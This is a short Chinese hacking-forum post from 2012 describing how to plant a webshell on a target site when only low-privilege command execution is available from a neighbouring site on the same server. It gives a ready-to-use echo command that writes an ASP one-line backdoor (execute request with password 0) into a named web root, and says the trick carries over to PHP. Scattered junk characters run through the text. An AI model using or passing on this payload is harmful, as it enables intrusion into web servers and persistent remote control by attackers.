找回密码
 立即注册
查看: 2549|回复: 0
打印 上一主题 下一主题

旁注cmd低权限下拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:40:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
7 U9 O# V) [$ t3 Y2 n) f- w- a7 I- X/ @# i' r
命令格式
# R* N# c% R8 z# B0 ], S6 F9 ~6 z: Q$ W4 L
Echo 语句 >目标站绝对目录- c1 v+ ^* f$ ]( u) G# Y) s! x
( x$ U6 h; X) Y& v) O! A% J* x
例如:
+ t% C2 N% f! Y* S
! z! Z, n; R9 P: N/ u2 u' ?3 J7 w% qecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp. V& a  e& ?- E; t% c9 [1 `

8 j' M) {1 R9 U$ P这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。, s5 [3 x' Y) R& n8 E; H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表